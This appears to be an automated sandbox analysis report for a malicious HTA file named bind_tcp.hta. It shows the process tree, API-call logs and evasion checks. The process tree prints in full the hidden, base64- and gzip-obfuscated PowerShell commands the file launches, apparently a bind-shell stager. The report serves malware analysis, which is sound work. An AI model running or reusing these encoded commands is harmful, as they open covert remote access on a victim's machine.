Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	May 31, 2024, 10:03 a.m.	May 31, 2024, 10:16 a.m.

Size	7.2KB
Type	HTML document, ASCII text, with very long lines
MD5	`248aa4289e3739f172987f89212e4093`
SHA256	`82989ca18031638c484db4469a094bcf812641717e0f70480394b17ade9ded98`
CRC32	`A0BC09EB`
ssdeep	`192:+zPn2jh1hqT2Fr2rG71OrYf4KqLl9QhufdUk4TRQW+ZiPj2vF6hd9d:+zPn2jh1hsWr2S7Ar2qLwu1Ukny2Uhdj`
Yara	Antivirus - Contains references to security software

mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\bind_tcp.hta
2560
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEASQBzAHkAMQAyAFUAQwBBADcAVgBXAGIAVwB7ADIAfQBpAE8AQgBEACsAdgB0AEwAKwBoADIAaQBGAGwARQBTACcAJwArACcAJwBsAEoATAB5AG8AdQA2ADIAMAAwAGoAbABRAG0AaQBCAEMAMgBZAFoAQwBLAFkAdABPAGIAdQBLAEEAaQB4AFAAVAB4AEMAbAB3AGUAewAyAH0AdgBmAGIAeAB5AFMAbAByADEAdAA3ADMAbwB7ADEAfQByAFMAVwBFAFkAOAArAE0AeAA4ADgAOABNACsATQB3AGkAMwAxAEIAZQBhAHkAcwB2AGkARABsADIAewAyAH0AdAAzAFMAagBHAEcATwBNAEcAUgBvAGwAWAA0AFEAMQBwAFYASwB7ADEAfQB4AFoANwA1ADMAcQB6ADcAdQBWAE0ASwBoAHsAMgB9AFYARAA0AHIAMgBnAHkAdAAxAHgAMABlAFkAUgByACcAJwArACcAJwBQAHoAOAA3AGEAVwBaAEsAUQBXAE8AeQB7ADIAfQBhAHgAZABFAG8ARABRAGwAMAAnACcAKwAnACcAUgAyAGoASgBOAFYAMAA1AFUAOQBsAHMAaQBRAEoATwBiADYAOAB1AHkAZQArACcAJwArACcAJwBVAEwANABwAGwAZAA5AHIARgA0AHoAZgBZAFYAYQBJADcAZAByAFkAWAB4AEwAbABHAE0AVwBCADMATwB0AHoASAAwAHYAUABhAHQANgBhAFUAYQBHAHAAWAA3ACsAcQArAHUAeQA0AFAAcQArAGQAUAAyAFMAWQBwAFoAcgBxADcAVgBKAEIAbwBsAHIAQQBtAEsAbwByADMAMwBWADUANABHAGkAMwBKAHAAcgBxAFUAagB7ADIAfQBoAEsAUQA5AEYAYgBVAEwAagBaAHEATgAyAEgAYQBjADQASgBBAE8AdwA5AGsAaABjAEkAcABZADgAUwBGAFcANAB6AFAATgAxAEUAaQBLAHkASgBOADcAZgBTAHAAcgBaAEMAMgBrAHEAVABJAGMASgA5ADEARQBRAEoAQwBSAE4AMQBhAG8AeQBrAHcAZgBNADUAdgBQAGYAdABGAGwAeAArAGwAVQBXAEMAeABxAFIAbQBoAE0ATABrAHYAQwAxAFIANQBKAEgANgBwAE8AMABaAHUATQA0AFkATwBTAEsAaABIAFAAUQA4ACcAJwArACcAJwBrAFIAQwA0ADgAVgBjADEAMABIAHMAawBhACsAJwAnACsAJwAnAEkAVgBvAGsAegB4AHEAcgBLAGYAegBHAGoARABjAGkAbQB4AE8ANgB0AFMAdABxAGgARQBrAGcATgBSAGEASgBYAEkAYQBnAHYAMwBOAFAAbABRAGMAYgBJAFgAbABOADkAdwBWAEYASgBCAEIAMwBHAEUAeABrAEEAdwBPADgAUwB3ADcAQQBrAEUASABVADYARgB5ADgAdwA2AEgAbQBoAEgAJwAnACsAJwAnAEwATgA4AGgANABEAFAAMgBwAEMAewAxAH0ATgBGACcAJwArACcAJwBmACsAcgBKAGgAVgB4AFkAWABUAHMAZQBEAEoARABqADQAcgBvAHkAUQBqACsAdgB3AEoAYwBhAFcAUwByAHUAdgBkADYAJwAnACsAJwAnAGwAdQB0ADEAVQB0AFYAVQBHAFEATQBGAG0AWgBqAFQAbwBQADUAcwB7ADIAfQBvAFAAOABhADgAOABiAGkAOABkAEsAZgBRADYAbQB6AHMAawBwAEQASABwADcARwBJAGMAVQBiADgAawByAFAAWgBTAFUARQBqAEkAUwBJADUASQByAFIAUQBiAGcASAArAGEAVwBtAHkAUQBvAEUATQAnACcAKwAnACcAWQBXAFcAQQBoAFkAWgBiAGMAKwBFAHsAMQB9AHQAUABLAEwAaQBTAGQAZgBLAEsAQQB0AEkAZwB7ADEAfQB3AEkAYgBBAHAAZQBRAGMAegAxAEgANQAzAFoAUgAwADUAVAB7ADEAfQBkAGcAbABFAFkAQwAzAHsAMgB9AHcAYQB5AFYAawBKAEkARQAxAEoASwBGADYAbQB4AEsAMAArAFgAMwB5AEMAawB0AGgAbABPAEkAYwBXAEgARwBlAFMAcABYADEAVQA4AGcAaABrAEoAcQBnAHEAJwAnACsAJwAnAEsAVQAxAHAAcwBvAFUAegB3AGYASwBvACsAdQArAHQAbQBUAEYAJwAnACsAJwAnAEEAZgBwADYASQAwAE4AOQBmAHsAMgB9AEIAbQBkAHgAYgBKAHYASABxAFUAZwB5AEgAOABJAEsARQBJAHkAOABOAGYARQBwAFoAaABLAFIAcQBtAEwAVABnAEYAZwA3AGoAeQA3AEsANAA5AFUAWAA4AFcAaABqAHgAaQBCADkAdwBOAEkAagB4AEEATgBXAEoAQQA2AGUAawBHAFIASgB3AE4ATwBjAEcASAByAE4ASQA4AEsASgAxAG8AeABFAEkASgBQAFgAagBTADcARABDADYAZwBTAFIAWgBMAGsANwBNAEkATABFAHEAaQB2AE8ARgByAG0AdwBwADcANABFAHAAawBTAGsAZwBNADMASQBkAHcAZQA0ADYASwBxAGoARwBrAGkAbwBBAHAASgBsAEcAVgArAHsAMgB9AEEAOABmAGYAcQA0ACsAdQBUAFAAdABoAEIAVABCADAAYwBvAE0AbQAxAGsANwBJAFYATwBnAGcAdQAyADYASgBHAG0AQgBVAEkANQBIAEkAZwBDAEwAYgBzAEkAagBDADYAZgBrAHAATABVAHYATgBOAG8ASAA0ADUASQBPAEUAWQB5AHAARQB6AE0AMwA2AEsAMQBvADMAZAB7ADEAfQBBAHoANABYAGYAdABSAHMAZQA5AFgAMgA2AEcAQQBxAFQAUgA2ADcAZgBUAG8AYwBYADMAVQArAEkAYgBoAFkAYgB7ADIAfQA5AE0AQQArAFUARQB2AEkASwBmAGUAdQBDAFcAOABjADAAZQAwAGgAOABqACsAUQBrADIAcgB0AGYAUQB0AGMAdwBUAHoAYQAwAGMANABGADQANgBZAE8AcwBnAGUATABYADEAbQBEAGoAdQAyADQAVQAxAFQAawAyADcAcwBpAGUAdAAzAHIARAA4ADIAagBSAFMAbwAyAG0AcgBaAE4AeQBaAHEATgBsAHUAWABUAFgATQBGADQARQAxAHAAZgBiAEYAQwB3AFMAQwBpAG0AMgAwAGYANQBsAEIAUgBMAHsAMgB9AHUAVwBrADEAcQBtAHcAOAA1ADcANwBhAHUANwBTAGEATgA3AE8AMgBHADIAMABlAG8AdQB3AHcAbABQAHYAWgBOAHAAeAB6AEMATQAwAHcAQgAzADMAQgAxAEMARgBnACsAYQA3AHUANgBtAGYAcwBWAEgAdABoADkAWgBoAGoASABPAGUAcwBpAEMANgA2ADIAMwAzAGEAcwB2AHUAQgAwAGgAdgBPAGsAWQA5AFEAewAxAH0AdgBUADgAWQAnACcAKwAnACcAZABhAGsAeQA0AGgAUgBjADkAZgByAEkAdwAnACcAKwAnACcAdwB0AGIAUQBHAEwAUABHAG8AbwAxADYAVwA0AHUAUwAyADQAZgB6ADcAdQAwAE4AZAB2AHQAMwBnADAAWgBvADEASwBjADMAcQBOAE0AYQBUAHkAVgBPADQAdwBaAHQAewAxAH0AbwB6AHUANABjAGoAeABEAGIAWgBIADYAZQBXAFIAYgBkAFQASABCAE8AYgBqAGIARABTAHgAcABXADIARQBGADEAZQBUAE0AZABoAHEAKwBNAHYAUQBPAEoAMQAwAGoAcABCADEAMQBKACsAbQBEAGIAeQB5AGUATwA1AE4AOQB7ADIAfQBZAEIAWABTAHkAewAxAH0ANgArADYAUQB3AGYANwBvAHUAcwBIAFIAbQBBADEAdQBNAE8AcgBmADcAcgBvAEcAewAxAH0ARABkAHMASQBiAHQAbABJADkAOQBkAGIAKwBPAGIAOQBlAGIAagA0ADAAYgBnADMAZwBRAHYAcgBKACcAJwArACcAJwBGAHgAZQB2ADMANQBBADgAUgA3AGQAawAxAGoAMABXAHoATQBLADkASAAyAGQAaQB5AEwANAB2AHQAMwBGAFcAYQB0AEgAZwA3AEMAewAyAH0AbAByAFIAZAAzAEcAUwBMAGoARQBEAE8AawBBADEATAA3AE8AeQB5ADUATgB1AFUAWgArAEgAewAxAH0ARQBvAE4AVABaAE8ATgBmAGsAVwBTAG0ARABCAG8AagBkAEEAOABTAHkANABqAHgAcgBnAHYAMgAwAE4AJwAnACsAJwAnAGUAeQBLAEUAMQA3AFIAdQBHADcARgB7ADIAfQBYAFQAdQA3AFYAUwB6AE4AZAAnACcAKwAnACcAZQBSAEwAVQB7ADEAfQA5AHQARwB1AFgAUgAyAGQAZwB0AE8AUQB7ADEAfQA0AEEAZABXAHQAOQBFAGkAewAyAH0ARQBzAG0AcAB1AG0ANgBZAEoAMQBkADcAYwBtAHEAMAA4AEQAOQA1ACsAcwB6AFoAZgA3AHoAUgBwAHEAeQByAGIAUgBZADUATQBZAFoAdgBsAHQAcwBFAGMARABSAFYATgArACsAJwAnACsAJwAnAFYAWQB3AGEAdABBAFEASABWADYASABhADMAWABnAEkATwBqAFYAMQBCAE0AbwBMAHIAdABVADEAegBDAFoAMwBIAE8ARABzAEUAcgA3AHYAWABFAGgAUQBQAHMAQQBMAFEANgAzAEgAdwBtAEgAdwBRADUAUgA4AEQAQQBNAFgAbABRAEsAawBKADIAeQA4AFAAdQBXADIASAAzADUANwArAFUATgBVAFcAaABXAHMASgBmADgARwArAHMAZQBWADcANwBoADkAMAAzAE0AYwBtAHMANwB0AEgANQBhAGYAewAxAH0ASABoAFkATQBhAHsAMgB9ACsAcwBRAG0ARwBBAHEAUQBOAEMARABpAHMAdgBJAHsAJwAnACsAJwAnADIAfQBoAEgAdwBNAGgAQgBGAHAAaAB4AEcAKwBQADQAYwA4AGkAQQBzAGgAewAxAH0AdwBiAFgAMgBiAGkAZQBBAEIAdgByAGIAegBtAHsAMgB9AHcAWABSAEEAOABhAEUAbABRAHMAQQBBAEEAewAwAH0AewAwAH0AJwAnACkALQBmACcAJwA9ACcAJwAsACcAJwBuACcAJwAsACcAJwAvACcAJwApACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA
  2644
  - powershell.exe "powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAIsy12UCA7VWbW{2}iOBD+vtL+h2iFlES'+'lJLyou6200jlQmiBC2YZCKYtObuKAixPTxClwe{2}vfbxySlr1t73o{1}rSWEY8+Mx888M+Mwi31BeaysviDl2{2}t3SjGGOMGRolX4Q1pVK{1}xZ753qz7uVMKh{2}VD4r2gyt1x0eYRr'+'Pz87aWZKQWOy{2}axdEoDQl0'+'R2jJNV05U9lsiQJOb68uye+'+'UL4pld9rF4zfYVaI7drYXxLlGMWB3OtzH0vPat6aUaGpX7+q+uy4Pq+dP2SYpZrq7VJBolrAmKor33V54Gi3JprqUj{2}hKQ9FbULjZqN2Hac4JAOw9khcIpY8SFW4zPN1EiKyJN7fSprZC2kqTIcJ91EQJCRN1aoykwfM5vPftFlx+lUWCxqRmhMLkvC1R5JH6pO0ZuM4YOSKhHPQ8'+'kRC48Vc10Hska+'+'IVokzxqrKfzGjDcimxO6tStqhEkgNRaJXIagv3NPlQcbIXlN9wVFJBB3GExkAwO8Sw7AkEHU6Fy8w6HmhH'+'LN8h4DP2pC{1}NF'+'f+rJhVxYXTseDJDj4royQj+vwJcaWSruvd6'+'lut1UtVUGQMFmZjToP5s{2}oP8a88bi8dKfQ6mzskpDHp7GIcUb8krPZSUEjISI5IrRQbgH+aWmyQoEM'+'YWWAhYZbc+E{1}tPKLiSdfKKAtIg{1}wIbApeQcz1H53ZR05T{1}dglEYC3{2}wayVkJIE1JKF6mxK0+X3yCkthlOIcWHGeSpX1U8ghkJqgq'+'KU1psoUzwfKo+u+tmTF'+'Afp6I0N9f{2}BmdxbJvHqUgyH8IKEIy8NfEpZhKRqmLTgFg7jy7K49UX8WhjxiB9wNIjxANWJA6ekGRJwNOcGHrNI8KJ1oxEIJPXjS7DC6gSRZLk7MILEqivOFrmwp74EpkSkgM3Idwe46KqjGkioApJlGV+{2}A8ffq4+uTPthBTB0coMm1k7IVOggu26JGmBUI5HIgCLbsIjC6fkpLUvNNoH45IOEYypEzM36K1o3d{1}Az4XftRse9X26GAqTR67fTocX3U+IbhYb{2}9MA+UEvIKfeuCW8c0e0h8j+Qk2rtfQtcwTza0c4F46YOsgeLX1mDju24U1Tk27siet3rD82jRSo2mrZNyZqNluXTXMF4E1pfbFCwSCim20f5lBRL{2}uWk1qmw8577au7SaN7O2G20eouwwlPvZNpxzCM0wB33B1CFg+a7u6mfsVHth9ZhjHOesiC66233asvuB0hvOkY9Q{1}vT8Y'+'daky4hRc9frIw'+'wtbQGLPGoo16W4uS24fz7u0Ndvt3g0Zo1Kc3qNMaTyVO4wZt{1}ozu4cjxDbZH6eWRbdTHBObjbDSxpW2EF1eTMdhq+MvQOJ10jpB11J+mDbyyeO5N9{2}YBXSy{1}6+6Qwf7ousHRmA1uMOrf7roG{1}DdsIbtlI99db+Ob9ebj40bg3gQvrJ'+'Fxev35A8R7dk1j0WzMK9H2diyL4vt3FWatHg7C{2}lrRd3GSLjEDOkA1L7Oyy5NuUZ+H{1}EoNTZONfkWSmDBojdA8Sy4jxrgv20N'+'eyKE17RuG7F{2}XTu7VSzNd'+'eRLU{1}9tGuXR2dgtOQ{1}4AdWt9Ei{2}Esmpum6YJ1d7cmq08D95+szZf7zRpqyrbRY5MYZvltsEcDRVN++'+'VYwatAQHV6Ha3XgIOjV1BMoLrtU1zCZ3HODsEr7vXEhQPsALQ63HwmHwQ5R8DAMXlQKkJ2y8PuW2H357+UNUWhWsJf8G+seV77h903Mcms7tH5af{1}HhYMa{2}+sQmGAqQNCDisvI{'+'2}hHwMhBFphxG+P4c8iAsh{1}wbX2bieABvrbzm{2}wXRA8aElQsAAA{0}{0}')-f'=','n','/')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
    2808

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (12 events)

Time & API	Arguments	Status	Return
GetComputerNameW May 31, 2024, 10:02 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2024, 10:02 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2024, 10:02 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2024, 10:02 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 31, 2024, 10:02 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2024, 10:02 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2024, 10:02 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2024, 10:02 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2024, 10:02 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2024, 10:02 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 31, 2024, 10:02 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 31, 2024, 10:02 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent May 31, 2024, 10:02 a.m.			0	0
IsDebuggerPresent May 31, 2024, 10:02 a.m.			0	0

Uses Windows APIs to generate a cryptographic key (50 out of 80 events)

Time & API	Arguments	Status	Return
CryptExportKey May 31, 2024, 10:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038ab80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038b100 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038b100 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038b100 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038b300 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038b300 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038b300 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038b300 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038b300 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038b300 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038ab40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038ab40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038ab40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038b100 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038b100 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038b100 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038a740 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038b100 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038b100 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038b100 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038b100 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038b100 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038b100 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038b100 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038b480 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038b480 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038b480 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038b480 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038b480 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038b480 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038b480 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038b480 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038b480 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038b480 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038b480 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038b480 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038b480 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038b480 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038b3c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038b3c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f5af0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f68b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f68b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f68b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f67b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f67b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f67b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f67b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f67b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 31, 2024, 10:02 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x002f67b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx May 31, 2024, 10:02 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 279 events)

Time & API	Arguments	Status
NtProtectVirtualMemory May 31, 2024, 10:02 a.m.	process_identifier: 2560 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73bc2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:02 a.m.	process_identifier: 2644 region_size: 1179648 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a00000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:02 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ae0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 31, 2024, 10:02 a.m.	process_identifier: 2644 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72891000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 31, 2024, 10:02 a.m.	process_identifier: 2644 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0266a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
